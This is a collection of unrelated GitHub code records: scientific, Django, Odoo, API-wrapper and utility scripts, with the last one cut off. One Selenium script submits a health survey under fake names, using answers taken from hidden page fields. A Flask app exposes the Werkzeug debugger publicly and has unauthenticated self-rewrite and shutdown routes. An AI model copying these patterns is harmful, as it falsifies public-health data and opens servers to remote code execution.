density gradient field and the camera lens (m)\n experimental_parameters['Z_A'] = experimental_parameters['object_distance'] - experimental_parameters['Z_D']\n \n # distance between the dot pattern and the camera lens (m)\n experimental_parameters['Z_B'] = experimental_parameters['object_distance']\n\n # origin (pixels)\n experimental_parameters['x0'] = 256 \n experimental_parameters['y0'] = 256 \n\n # size of a pixel on the camera sensor (m)\n experimental_parameters['pixel_pitch'] = 10e-6\n\n # focal length of camera lens (m)\n experimental_parameters['focal_length'] = 105e-3\n\n # non-dimensional magnification of the dot pattern (can also set it directly)\n experimental_parameters['magnification'] = experimental_parameters['focal_length'] / (\n experimental_parameters['object_distance'] - experimental_parameters['focal_length'])\n\n # uncertainty in magnification\n experimental_parameters['sigma_M'] = 0.1\n\n # uncertainty in Z_D (m)\n experimental_parameters['sigma_Z_D'] = 1e-3\n\n\n # non-dimensional magnification of the mid-z-PLANE of the density gradient field\n experimental_parameters['magnification_grad'] = experimental_parameters['magnification'] \\\n * experimental_parameters['Z_B'] / experimental_parameters['Z_A']\n \n # --------------------------\n # processing\n # --------------------------\n # load displacements and uncertainties from file \n if displacement_estimation_method == 'c':\n # 
correlation\n X_pix, Y_pix, U, V, sigma_U, sigma_V, Eval = helper_functions.load_displacements_correlation(filename, displacement_uncertainty_method) \n elif displacement_estimation_method == 't':\n # tracking\n X_pix, Y_pix, U, V, sigma_U, sigma_V = helper_functions.load_displacements_tracking(filename, experimental_parameters['dot_spacing'], displacement_uncertainty_method) \n\n # account for sign convention\n if dataset_type == 'synthetic':\n U *= -1\n V *= -1\n\n # create mask array (1 for flow, 0 elsewhere) - only implemented for Correlation at the moment\n if displacement_estimation_method == 'c':\n mask = helper_functions.create_mask(X_pix.shape[0], X_pix.shape[1], Eval)\n elif displacement_estimation_method == 't': \n mask = np.ones_like(a=U)\n\n # convert displacements to density gradients and co-ordinates to physical units \n X, Y, rho_x, rho_y, sigma_rho_x, sigma_rho_y = helper_functions.convert_displacements_to_physical_units(X_pix, Y_pix, U, V, sigma_U, sigma_V, experimental_parameters, mask)\n\n # define dirichlet boundary points (minimum one point) - here defined to be all boundaries\n # This is specific to the current dataset\n dirichlet_label, rho_dirichlet, sigma_rho_dirichlet = helper_functions.set_bc(X_pix.shape[0], X_pix.shape[1], experimental_parameters['rho_0'], experimental_parameters['sigma_rho_0'])\n \n # calculate density and uncertainty\n if density_integration_method == 'p':\n # Poisson\n rho, sigma_rho = Density_integration_Poisson_uncertainty(X, Y, mask, rho_x, rho_y,\n dirichlet_label, rho_dirichlet,\n uncertainty_quantification=True,\n sigma_grad_x=sigma_rho_x, sigma_grad_y=sigma_rho_y,\n sigma_dirichlet=sigma_rho_dirichlet)\n elif density_integration_method == 'w':\n # Weighted Least Squares\n rho, sigma_rho = Density_integration_WLS_uncertainty(X, Y, mask,rho_x, rho_y,\n dirichlet_label, rho_dirichlet,\n uncertainty_quantification=True,\n sigma_grad_x=sigma_rho_x, sigma_grad_y=sigma_rho_y,\n sigma_dirichlet=sigma_rho_dirichlet)\n\n # save the results to file\n savemat(filename='sample-result.mat', mdict={'X': X, 'Y': Y, 'rho': rho, 'sigma_rho': sigma_rho,\n 'dirichlet_label': dirichlet_label, 'rho_dirichlet':rho_dirichlet, 'sigma_rho_dirichlet':sigma_rho_dirichlet\n }, long_field_names=True)\n\n # plot results\n fig = helper_functions.plot_figures(X, Y, rho_x, rho_y, rho, sigma_rho)\n \n # save plot to file\n fig.savefig('sample-result.png')\n plt.close()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"lalitkrajendran/bos-density-integration-package","sub_path":"sample_script.py","file_name":"sample_script.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
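The script above integrates measured density gradients from a Dirichlet anchor while propagating the gradient uncertainties. A one-dimensional analogue (illustrative only, not the package's 2D Poisson/WLS solvers) makes the propagation explicit: variances of independent gradient samples add in quadrature along the integration path.

import numpy as np

dx = 0.01
x = np.arange(0.0, 1.0, dx)
rho_x = np.cos(2 * np.pi * x)                 # synthetic gradient field
sigma_rho_x = 0.05 * np.ones_like(rho_x)      # per-sample gradient uncertainty

rho_0, sigma_rho_0 = 1.225, 1e-3              # Dirichlet anchor and its uncertainty
rho = rho_0 + np.cumsum(rho_x) * dx           # cumulative integration from the anchor
var = sigma_rho_0**2 + np.cumsum((sigma_rho_x * dx)**2)
sigma_rho = np.sqrt(var)                      # uncertainty grows along the path
print(rho[-1], sigma_rho[-1])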
+{"seq_id":"72655404251","text":"from django.core.paginator import Paginator\nfrom django.core.paginator import EmptyPage\nfrom django.core.paginator import PageNotAnInteger\nfrom django.db.models import F\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404, redirect\n\n# Create your views here.\nfrom django.views.generic import ListView, DetailView\nfrom django.contrib import messages\n\nfrom news.models import Articles\nfrom .models import Programs\n\n\n\n\nclass ProgramsList(ListView):\n model = Programs\n template_name = 'programs/programms.html'\n paginate_by = 6\n\n def get_context_data(self, **kwargs):\n context = super(ProgramsList, self).get_context_data(**kwargs)\n list_exam = Programs.objects.all()\n paginator = Paginator(list_exam, self.paginate_by)\n\n page = self.request.GET.get('page')\n\n try:\n file_exams = paginator.page(page)\n except PageNotAnInteger:\n file_exams = paginator.page(1)\n except EmptyPage:\n file_exams = paginator.page(paginator.num_pages)\n context['programms_top'] = Articles.objects.all().order_by('-view')[:6]\n context['list_exams'] = file_exams\n return context\n\n# class ProgramsDetail(DetailView):\n# model = Articles\n# template_name = 'programs/programm.html'\n#\n# def get_context_data(self, **kwargs):\n# context = super(ProgramsDetail, self).get_context_data(**kwargs)\n# context['top_art'] = Articles.objects.all().order_by('-view')[:10]\n# context['top_prog'] = Programs.objects.all().order_by('?')[:10]\n\n\n\ndef ProgramsDetail(request, slug):\n tag=None\n article_details = get_object_or_404(Programs,slug=slug)\n top_art = Articles.objects.all().order_by('-view')[:6]\n top_prog = Programs.objects.all().order_by('?')[:6]\n articles_top = Articles.objects.all().order_by('-view')[:6]\n\n return render(\n request,\n 'programs/programm.html',\n {\n 'article_details': article_details,\n 'top_art':top_art,\n 'articles_top':articles_top,\n 'top_prog':top_prog,\n 'tag': tag\n }\n )\n\n\n\n\ndef post_searchProgramm(request):\n queryProgramm = request.GET.get('searchProgramm')\n if queryProgramm:\n results = Programs.objects.filter(title__icontains=queryProgramm).order_by('-date')\n\n total_results = results.count()\n return render(request,\n 'news/posts.html',\n {\n 'results': results,\n 'query': queryProgramm,\n 'total_results': total_results})\n else:\n messages.info(request, 'no results found for {}', format(queryProgramm))","repo_name":"LibGame/itRapter","sub_path":"itRapter/programs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27807192518","text":"from flask import Flask,request\nimport os,sys\nfrom werkzeug.serving import run_simple\n\napp=Flask(__name__)\n\ndef refresh():\n with open(__file__,'w') as fo:\n with open('target.py','r') as f2:\n fo.writelines(f2.readlines())\n with open(__file__) as fo:\n source_code = fo.read()\n byte_code = compile(source_code, __file__, \"exec\")\n # exec(byte_code)\n python = sys.executable\n os.execl(python, python, * sys.argv)\n exit()\n\n@app.route('/')\ndef home():\n return '1'\n\n@app.route('/add')\ndef add():\n refresh()\n return '12'\n\n@app.route('/shutdown')\ndef shutdown():\n shutdown_func=request.environ.get('werkzeug.server.shutdown')\n shutdown_func()\n raise RuntimeError\n\n\n \n\nif __name__=='__main__':\n run_simple('0.0.0.0',8000,app,use_debugger=True,use_reloader=False)\n # app.run(host='0.0.0.0')\n","repo_name":"Timothychen00/Flask-Reload","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"22927537897","text":"from odoo.tests import Form\nfrom odoo.tests.common import SavepointCase\nfrom odoo.tools import float_compare\n\n\nclass TestDeliveryPriceMethod(SavepointCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n self = cls\n product_shipping_cost = self.env[\"product.product\"].create(\n {\n \"type\": \"service\",\n \"name\": \"Shipping costs\",\n \"standard_price\": 10,\n \"list_price\": 100,\n }\n )\n self.carrier = self.env[\"delivery.carrier\"].create(\n {\n \"name\": \"Test carrier\",\n \"delivery_type\": \"fixed\",\n \"product_id\": product_shipping_cost.id,\n \"fixed_price\": 99.99,\n }\n )\n self.pricelist = self.env[\"product.pricelist\"].create(\n {\n \"name\": \"Test pricelist\",\n \"item_ids\": [\n (\n 0,\n 0,\n {\n \"applied_on\": \"3_global\",\n \"compute_price\": \"formula\",\n \"base\": \"list_price\",\n },\n )\n ],\n }\n )\n self.product = self.env.ref(\"product.product_delivery_01\")\n self.partner = self.env.ref(\"base.res_partner_12\")\n self.sale = self.env[\"sale.order\"].create(\n {\n \"partner_id\": self.partner.id,\n \"pricelist_id\": self.pricelist.id,\n \"carrier_id\": self.carrier.id,\n \"order_line\": [\n (0, 0, {\"product_id\": self.product.id, \"product_uom_qty\": 1})\n ],\n }\n )\n\n def _add_delivery(self):\n sale = self.sale\n delivery_wizard = Form(\n self.env[\"choose.delivery.carrier\"].with_context(\n {\"default_order_id\": sale.id, \"default_carrier_id\": self.carrier}\n )\n )\n choose_delivery_carrier = delivery_wizard.save()\n choose_delivery_carrier.button_confirm()\n\n def test_delivery_price_fixed(self):\n sale = self.sale\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(float_compare(delivery_price, 99.99, precision_digits=2), 0)\n self.assertEqual(len(delivery_lines), 1)\n sale.action_confirm()\n picking = sale.picking_ids[0]\n self.assertEqual(len(picking.move_lines), 1)\n self.assertEqual(picking.carrier_id, self.carrier)\n picking.action_confirm()\n picking.action_assign()\n self.assertFalse(picking.carrier_price)\n picking.send_to_shipper()\n self.assertEqual(picking.carrier_price, 99.99)\n\n def test_delivery_price_method(self):\n self.carrier.write({\"price_method\": \"fixed\", \"fixed_price\": 99.99})\n sale = self.sale\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(float_compare(delivery_price, 99.99, precision_digits=2), 0)\n self.assertEqual(len(delivery_lines), 1)\n self.carrier.write({\"price_method\": \"fixed\", \"fixed_price\": 5})\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(delivery_price, 5)\n self.carrier.write(\n {\n \"price_method\": \"base_on_rule\",\n \"price_rule_ids\": [\n (\n 0,\n 0,\n {\n \"variable\": \"quantity\",\n \"operator\": \"==\",\n \"max_value\": 1,\n \"list_base_price\": 11.11,\n },\n )\n ],\n }\n )\n self._add_delivery()\n delivery_lines = sale.order_line.filtered(lambda r: r.is_delivery)\n delivery_price = sum(delivery_lines.mapped(\"price_unit\"))\n self.assertEqual(delivery_price, 
11.11)\n","repo_name":"OCA/delivery-carrier","sub_path":"delivery_price_method/tests/test_delivery_price_method.py","file_name":"test_delivery_price_method.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"32"}
+{"seq_id":"73168720731","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nimport time\nimport os\n# Version: 2.0\n# 浏览器驱动版本:114.0.5735.90\n\n# 获取人名列表函数定义\ndef GettingNames(wd):\n # 调用WebDriver 对象的get方法 可以让浏览器打开指定网址\n wd.maximize_window()\n wd.get('https://www.qmsjmfb.com/')\n\n # 搜索名字\n elements = [element.text for element in wd.find_elements(By.XPATH, \"//div/ul/li\")]\n return elements\n\n# 填写身份信息函数定义\ndef FulfillInfo(wd, name):\n # 调用WebDriver 对象的get方法 可以让浏览器打开指定网址\n wd.maximize_window()\n wd.get('https://www.jscdc.cn/KABP2011/business/index1.jsp?tdsourcetag=s_pcqq_aiomsg')\n\n # 通过 Select 对象选中南京市,栖霞区,马群街道以及填入姓名\n Select(wd.find_element(By.ID, \"zone3\")).select_by_visible_text(\"南京市\")\n Select(wd.find_element(By.ID, \"zone4\")).select_by_visible_text(\"栖霞区\")\n Select(wd.find_element(By.ID, \"zone5\")).select_by_visible_text(\"马群街道\")\n wd.find_element(By.ID, 'name').send_keys(name)\n\n # 通过 Select 对象选中0~15岁以下,男,小学,学生,小学3~4年级\n Select(wd.find_element(By.ID, \"ageGroup\")).select_by_visible_text(\"0~15岁以下\")\n Select(wd.find_element(By.ID, \"sex\")).select_by_visible_text(\"男\")\n Select(wd.find_element(By.ID, \"educationStatus\")).select_by_visible_text(\"小学\")\n Select(wd.find_element(By.ID, \"metier\")).select_by_visible_text(\"学生\")\n Select(wd.find_element(By.ID, \"studentLevel\")).select_by_visible_text(\"小学3~4年级\")\n\n # 点击开始按钮\n wd.find_element(By.ID, 'log_img').click()\n\n# 回答问题函数定义\ndef AnsweringQuestions(wd):\n # 获取答案\n # 获取题数\n num = wd.find_element(By.ID, \"__subjectCount\")\n num = int(num.text)\n\n # 获取所有input的元素构成一个list\n answers = wd.find_elements(By.XPATH, \"//*[@id=\\\"subject\\\"]/input\")\n\n # 填充答案\n for i in range(num):\n answer = answers[i].get_attribute('value').split(\",\")[1]\n wd.find_element(By.CSS_SELECTOR, \"#KWait\" + str(i + 1) + \" input[value=\\\"\" + answer + str(i + 1) + \"\\\"]\").click()\n\n wd.find_element(By.ID, \"btnAct\" + str(num) + \"\").click()\n wd.switch_to.alert.accept()\n\n# Main Part\n# 创建 WebDriver 对象,指明使用chrome浏览器驱动\n# webDriver = webdriver.Chrome(service=Service(r'd:\\tools\\chromedriver.exe'))\nwebDriver = webdriver.Chrome(service=Service(r'114.0.5735.90\\chromedriver.exe'))\nnameList = GettingNames(webDriver)\n\n# 开始循环答题\nfor i in range(1):\n name = nameList[i]\n FulfillInfo(webDriver, name)\n AnsweringQuestions(webDriver)\n\n # 等到网页加载完毕后截屏保存\n time.sleep(1)\n\n # 检测截图文件夹是否存在\n if not os.path.exists('Screenshots/'):\n os.makedirs('Screenshots/')\n \n # 创建截图文件\n if(webDriver.get_screenshot_as_file('Screenshots/' + str(i+1) + '.png') ):\n print(\"Screenshots/\" + str(i+1) + \".png is saved successfully.\")\n else:\n print(\"Failed to save the Screenshots/\" + str(i+1) + \".png.\")\n break\n\n# 关闭浏览器\nwebDriver.close()\n","repo_name":"nwomn/AutoTask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30013584137","text":"\ndef stem_plot(lst):\n lst = [str(i) if i > 9 else '0'+str(i) for i in lst]\n dic = {}\n for i in lst:\n stem, leaf = i[:-1], i[-1]\n if stem not in dic: \n dic[stem] = []\n dic[stem] += [leaf]\n return ['{} | {}'.format(k, ' '.join(sorted(v))) for k, v in sorted(dic.items(), key=lambda x: int(x[0]))]\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"sibD9TFg7pmQuzJxW_10.py","file_name":"sibD9TFg7pmQuzJxW_10.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2055308551","text":"import pandas as pd\nimport sys\n\ndef get_state_code_index(df):\n col_list = list(df.columns).index('state_code')\n return col_list\n\ndef state_code_to_int(x):\n x[i] = int(x[i])\n return x\n\n# rst ne\ndef state_code_cleaner(df):\n df['state_code'] = df['state_code'].apply(str)\n df['len'] = df['state_code'].apply(lambda x: len((x)))\n tmp1 = df[(df['len'] == 9) & (~df['state_code'].str.contains('-'))]\n tmp2 = tmp1.drop(['len'],axis=1)\n df_fn = tmp2.apply(state_code_to_int,axis=1)\n # print(tmp2.head())\n return df_fn\n\nif __name__ == '__main__':\n\n fileIn = sys.argv[1]\n fileOut = fileIn[:-4] + '_clr.csv'\n\n df = pd.read_csv(fileIn)\n global i\n i = get_state_code_index(df)\n\n res = state_code_cleaner(df)\n # print(res.columns)\n # res = res.drop(['Unnamed: 0'],axis=1)\n # print(res.info())\n res.to_csv(fileOut,index=False)\n\n # print(state_code_cleaner(jb))\n # print(stae_code_cleaner(jb))\n # print(list(rst.columns).index('len'))\n # rst_fn.to_csv('data/restaurant_clean.csv')","repo_name":"tkionshao/com.iii.4th.state-center-maker","sub_path":"state_code_cleaner/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"18576817801","text":"#!/usr/bin/python3\n\nimport json\nimport requests\nimport requests.exceptions\n\n\nclass DefectDojo():\n \"\"\"\n Initialize a DefectDojo API instance.\n \"\"\"\n def __init__(self, api_key, user, host, user_agent=None, verify_ssl=False, api_version='v2', timeout=60, debug=True):\n self.api_key = api_key\n self.user = user\n self.host = host + '/api/' + api_version + '/'\n self.verify_ssl = verify_ssl\n self.api_version = api_version\n self.timeout = timeout\n\n if not user_agent:\n self.user_agent = 'DefectDojo_api'\n else:\n self.user_agent = user_agent\n\n self.debug = debug\n\n def get_users(self, username=None, limit=20):\n params = {}\n if limit:\n params['limit'] = limit\n\n if username:\n params['username'] = username\n\n return self._request('GET', 'users/', params)\n\n def _request(self, method, url, params=None, data=None, files=None):\n \"\"\"Common handler for all HTTP requests.\"\"\"\n if not params:\n params = {}\n\n if data:\n data = json.dumps(data)\n\n headers = {\n 'User-Agent': self.user_agent,\n 'Authorization' : \"Token \" + self.api_key\n }\n\n if not files:\n headers['Content-Type'] = 'application/json'\n\n try:\n if self.debug:\n print(method + ' ' + self.host + url)\n print(params)\n print(headers)\n\n response = requests.request(method=method, url=self.host + url, params=params, data=data, files=files,\n headers=headers,\n timeout=self.timeout,\n verify=self.verify_ssl)\n\n if self.debug:\n print(response.status_code)\n print(response.text)\n\n\n # try:\n # if response.status_code == 201: #Created new object\n # object_id = response.headers[\"Location\"].split('/')\n # key_id = object_id[-2]\n # try:\n # data = int(key_id)\n # except:\n # data = response.json()\n #\n # return DefectDojoResponse(message=\"Upload complete\", data=data, success=True)\n # elif response.status_code == 204: #Object updates\n # return DefectDojoResponse(message=\"Object updated.\", success=True)\n # elif response.status_code == 400: #Object not created\n # return DefectDojoResponse(message=\"Error occured in API.\", success=False, data=response.text)\n # elif response.status_code == 404: #Object not created\n # return DefectDojoResponse(message=\"Object id does not exist.\", success=False, data=response.text)\n # elif response.status_code == 401:\n # return DefectDojoResponse(message=\"Unauthorized.\", success=False, data=response.text)\n # elif response.status_code == 414:\n # return DefectDojoResponse(message=\"Request-URI Too Large.\", success=False)\n # elif response.status_code == 500:\n # return DefectDojoResponse(message=\"An error 500 occured in the API.\", success=False, data=response.text)\n # else:\n # data = response.json()\n # return DefectDojoResponse(message=\"Success\", data=data, success=True, response_code=response.status_code)\n # except ValueError:\n # return DefectDojoResponse(message='JSON response could not be decoded.', success=False, data=response.text)\n # except requests.exceptions.SSLError:\n # return DefectDojoResponse(message='An SSL error occurred.', success=False)\n # except requests.exceptions.ConnectionError:\n # return DefectDojoResponse(message='A connection error occurred.', success=False)\n # except requests.exceptions.Timeout:\n # return DefectDojoResponse(message='The request timed out after ' + str(self.timeout) + ' seconds.',\n # success=False)\n except requests.exceptions.RequestException:\n return DefectDojoResponse(message='There was an error while handling the request.', success=False)\n\n\n\n\nclass 
DefectDojoResponse(object):\n \"\"\"\n Container for all DefectDojo API responses, even errors.\n\n \"\"\"\n\n def __init__(self, message, success, data=None, response_code=-1):\n self.message = message\n self.data = data\n self.success = success\n self.response_code = response_code\n\n def __str__(self):\n if self.data:\n return str(self.data)\n else:\n return self.message\n\n def id(self):\n if self.response_code == 400: #Bad Request\n raise ValueError('Object not created:' + json.dumps(self.data, sort_keys=True, indent=4, separators=(',', ': ')))\n return int(self.data)\n\n def count(self):\n return self.data[\"meta\"][\"total_count\"]\n\n def data_json(self, pretty=False):\n \"\"\"Returns the data as a valid JSON string.\"\"\"\n if pretty:\n return json.dumps(self.data, sort_keys=True, indent=4, separators=(',', ': '))\n else:\n return json.dumps(self.data)\n\n\n\nif __name__ == '__main__':\n pass","repo_name":"doublestraus/secret-finder","sub_path":"notification/defectdojo_old.py","file_name":"defectdojo_old.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
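A usage sketch for the wrapper above (host and token are placeholders). Note that with the whole success path commented out in _request, the method currently returns None on 2xx responses and a DefectDojoResponse only when a RequestException fires:

dd = DefectDojo(api_key='YOUR_API_TOKEN', user='admin',
                host='https://defectdojo.example.com', debug=False)
resp = dd.get_users(username='admin', limit=5)
print(resp)   # None on success until the response handling is restored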
+{"seq_id":"26281593900","text":"\"\"\"Sum of the Others\"\"\"\n\n# sumoftheothers\n\nwhile True:\n try:\n nums = list(map(int, input().split()))\n summary = sum(nums)\n for i, val in enumerate(nums):\n if summary - val == val:\n print(val)\n break\n except EOFError:\n break\n","repo_name":"lukaszlukaszew/kattis-solutions","sub_path":"S/sumoftheothers.py","file_name":"sumoftheothers.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"31854407803","text":"from decimal import Decimal\nfrom src import constants\nfrom time import strptime\nfrom datetime import datetime\n\n\nclass Assignment(object):\n\n def __init__(self, name, due_date, category=None, points_earned=None, points_possible=None,\n grade=None, weighted=False):\n\n self.name = name\n self.due_date = due_date\n\n if category:\n self.category = category.title()\n else:\n self.category = None\n\n # if assignment is weighted, its category must be declared\n if weighted:\n self.grade = grade\n self.points_earned = grade\n self.points_possible = 100\n\n # if assignment is unweighted, and points earned and points possible are given\n elif not weighted and points_earned is not None and points_possible is not None:\n self.points_earned = Decimal(points_earned)\n self.points_possible = Decimal(points_possible)\n self.grade = points_earned / points_possible * 100\n\n # if assignment is unweighted, and only points possible are given\n # (meaning the assignment has not been completed)\n elif not weighted and points_possible is not None:\n self.points_earned = None\n self.points_possible = points_possible\n self.grade = None\n\n else:\n raise InvalidAssignment(\"Assignment must contain a valid set of inputs\")\n\n @staticmethod\n def parse_date(date):\n assignment_day = int(date[1])\n assignment_month = strptime(date[0], '%b').tm_mon\n base_year = constants.QUARTERS[0][2].year\n if assignment_month > 8:\n assignment_year = base_year\n else:\n assignment_year = base_year + 1\n return datetime(assignment_year, assignment_month, assignment_day)\n\n def __str__(self):\n return \"Name: {}, Due Date: {}-{}-{}, Grade: {}\".format(self.name,\n self.due_date.year,\n self.due_date.month,\n self.due_date.day,\n self.grade)\n\n\nclass InvalidAssignment(Exception):\n\n def __init__(self, message):\n super(InvalidAssignment, self).__init__(message)","repo_name":"jpackard18/vcgraph","sub_path":"src/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"43030133852","text":"\"\"\"Code base runs inside a container and executes based on passed in parameters.\"\"\"\nimport sys\n\nimport vt\n\n\nclass VirusTotalService:\n\n def run(self, argv):\n\n client = vt.Client(argv[0])\n\n url_id = vt.url_id(argv[1])\n url = client.get_object('/urls/{}', url_id)\n\n return_dict = {}\n for item in dir(url):\n if not item.startswith('_'):\n return_dict[item] = getattr(url, item)\n return return_dict\n\n\nif __name__ == \"__main__\":\n print(VirusTotalService().run(sys.argv))\n","repo_name":"MSAdministrator/binocular","sub_path":"src/binocular/containers/virustotal.py","file_name":"virustotal.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"41859467195","text":"import csv\nimport pyinputplus as pyip\nimport tabulate\nfrom datetime import datetime\n\ndef readCsv(pathCsv):\n \"\"\"Function to read your csv file\n\n Args:\n pathCsv (path) : path of your csv file\n\n Return:\n db : return your data from database as dictionary data type\n\n Warning:\n pay attention to the number of your columns in database. Need adjusment in updating dictionary data\n \"\"\"\n # Read csv file\n file = open(pathCsv, 'r')\n reader = csv.reader(file, delimiter=';')\n\n # columns\n columns = next(reader)\n\n # make dictionary data type. db as a variable of dictionary data\n db = {'columns':columns}\n for row in reader: # updating dictionary data\n db.update({\n str(row[0]) : [int(row[0]), \n str(row[1]),\n str(row[2]), \n str(row[3]),\n int(row[4]),\n str(row[5])\n ]})\n # close program\n file.close()\n # return the dictionary data\n return db\n\ndef writeCsv(database, pathCsv):\n \"\"\"Function to overwrite your csv file\n\n Args:\n pathCsv (path) : path of your csv file\n database : dictionary data\n \"\"\"\n # Open database in write condition\n file = open(pathCsv, 'w')\n\n # Keep the database up to date\n writer = csv.writer(file, lineterminator='\\n', delimiter=';')\n columns = list(database.values())[0] # termasuk kolom dan data\n data = list(database.values())[1:]\n writer.writerow(columns) #db.values()\n data = list(database.values())[1:]\n for i in data:\n writer.writerow(i)\n # close Program\n file.close() \n\ndef valueInttoStr(intlistData):\n \"\"\"Fungsi untuk mengubah semua item yg berupa integer \n menjadi string yang terdapat di dalam list\n Args:\n intlistData (list): list yang berisi item integer\n \n Returns:\n strChoices: list yang semua value itemnya berubah menjadi string\n \"\"\"\n strChoices = []\n for i in intlistData:\n a = str(i)\n strChoices.append(a)\n return strChoices\n\ndef record(pathRecord):\n \"\"\"Function for showing what user does in the program\n\n Args:\n pathRecord : variable that stored your path of record file\n \"\"\"\n file = open(pathRecord, \"r\")\n print(file.read())\n file.close()\n\n\"\"\"CURD FUNCTION: \n 1. Create : addMenu(arg1,arg2,...)\n 2. Update : updateMenu(arg1,arg2,...)\n 3. Read : readMenu(arg1,arg2,...)\n 4. 
Delete : deleteMenu(arg1,arg2,...)\n\"\"\"\n\n# Show data function\ndef readMenu(database):\n \"\"\"Function to show your data as tabular format\n\n Args:\n database (dictionary): database yang akan ditampilkan\n \"\"\"\n # 2D list of database from csv file\n data = list(database.values())[1:]\n # select menu inside readMenu:\n while True:\n choices = ['Show all data in database','Show database in detail', 'Back to Main Menu']\n userInput = pyip.inputMenu(prompt='Select Read Menu:\\n', choices=choices, numbered=True) ## userInput di-return sebagai string\n # If user choose 1st option\n if userInput == 'Show all data in database':\n # if data in database doesnt exist\n if data == []:\n # only display columns without any data\n # print title\n print(\"\"\"\n=============================================== Yellow Pages created by @Wajul ===============================================\\n\n \"\"\")\n print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n print(\"\\nData doesn't exist!\")\n else:\n # print title\n print(\"\"\"\n=============================================== Yellow Pages created by @Wajul ===============================================\\n\n \"\"\")\n # print database in tabular format\n print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n print('\\n')\n # If user choose 2nd option\n elif userInput == 'Show database in detail':\n if data == []:\n # only display columns without any data\n print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n print(\"\\nData doesn't exist!\")\n else:\n choicesDetail = ['Detail ID', 'businessField', 'City', 'sorted companyName', 'sorted ID']\n inputChoicesDetail = pyip.inputMenu(prompt='Filter or sort data according to the: \\n', choices=choicesDetail, numbered=True)\n # data detailing based on ID\n if inputChoicesDetail == 'Detail ID':\n choices1 = [data[index][0] for index in range(len(data))]\n userInput1 = pyip.inputInt(prompt=\"Which ID do you want to return ?\\n\")\n #userInput1 = pyip.inputInt(prompt='Which ID do you want to return ?\\n', blockRegexes=[r'a-zA-Z'], lessThan=len(data))\n # if ID (index) doesn't exist in database\n if userInput1 not in choices1:\n print('Data does not exist!\\n')\n # else: ID (index) exist in database\n else:\n print(tabulate.tabulate(list([database[str(userInput1)]]), headers=database['columns'], tablefmt=\"github\"))\n print('\\n')\n \n # data detailing based on businessField \n elif inputChoicesDetail == 'businessField':\n # Available businessField stored in set data type, hence there's no duplication, then convert into list data type\n businessFieldSet = {data[index][2] for index in range(len(data))}\n businessFieldList = list(businessFieldSet)\n # user choose city\n userInput = pyip.inputMenu(prompt=\"Input the businessField you're looking for\\n\", choices=businessFieldList, numbered=True)\n # find the keys of dictionary data\n keysTarget = [str(i[0]) for i in data if i[2] == userInput]\n\n # data target in 2D list based on keysTarget\n dataTarget = [database[i] for i in keysTarget]\n\n # show dataTarget in tabular format\n print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n \n # data detailing based on city\n elif inputChoicesDetail == 'City':\n # Available city stored in set data type, hence there's no duplication, the convert into list data type\n citySet = {data[index][3] for index in range(len(data))}\n cityList = list(citySet)\n # user choose city\n userInput = 
pyip.inputMenu(prompt=\"Input the city you're looking for\\n\", choices=cityList, numbered=True)\n # find the keys of dictionary\n keysTarget = [str(i[0]) for i in data if i[3] == userInput]\n\n # data target in 2D list based on keysTarget\n dataTarget = [database[i] for i in keysTarget]\n\n # show dataTarget in tabular format\n print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n \n # sorting based on companyName (A-Z)\n elif inputChoicesDetail == 'sorted companyName':\n # sorted company Name\n companyNameList = [data[index][1] for index in range(len(data))]\n companyNameSort = sorted(companyNameList) # order by companyName A-Z #\n\n # find the keys of dictionary\n keysTarget = []\n for valuesI in companyNameSort: # compare sorted companyName with 2D list[1] which is companyName of database, \n for valuesJ in data: # when match, return index[0] which is similar with keys\n if valuesI == valuesJ[1]:\n keysTarget.append(valuesJ[0])\n\n # data target in 2D list based on keysTarget\n 